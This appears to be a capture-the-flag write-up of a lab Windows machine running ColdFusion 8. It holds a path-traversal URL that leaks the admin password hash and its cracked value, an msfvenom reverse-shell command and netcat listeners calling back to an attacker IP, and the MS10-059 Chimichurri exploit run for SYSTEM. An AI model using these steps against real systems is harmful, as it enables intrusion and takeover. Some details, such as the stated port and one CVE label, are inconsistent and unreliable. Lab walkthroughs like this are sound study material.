Discovered the box is running Adobe ColdFusion 8 on port 80
Exploiting CVE-2010-2861 CVE-67047 we get a reverse shell
used MS-010-059 for privilege escalation and got SYSTEM
Tools Used:
nmap, msfvenon, windows-exploit-suggester.py
Nmap
# Nmap 7.80 scan initiated Thu Mar 5 17:34:43 2020 as: nmap -sC -sV -p- -oA nmap/Artic 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.060s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 5 17:40:13 2020 -- 1 IP address (1 host up) scanned in 330.62 seconds
Exploiting Cold Fusion 8
Exploit
# Request sent to the Cold Fusion Web App
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Cracking the Hash
2f635f6d20e3fde0c53075a84b68fb07dcec9b03:happyday
Admin Login
We have admin access and we can see the path of the application is: C:\ColdFusion8\wwwroot\CFIDE
Getting a Shell
Generate a shell with msfvenon
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=53 -f raw > shell.jsp
Uploading the shell to the target
Triggering the shell
http://10.10.10.11:8500/CFIDE/shell.jsp
# rlwrap nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49590
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>
Privilege Escalation
I don't want to use metasploit so I am going with the MS10-059
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
# c:\ColdFusion8\wwwroot\CFIDE>.\Chimichurri.exe 10.10.14.2 9001
.\Chimichurri.exe 10.10.14.2 9001
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
Get a reverse shell as SYSTEM
# rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49569
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\ColdFusion8\wwwroot\CFIDE>whoami
whoami
nt authority\system
c:\ColdFusion8\wwwroot\CFIDE>
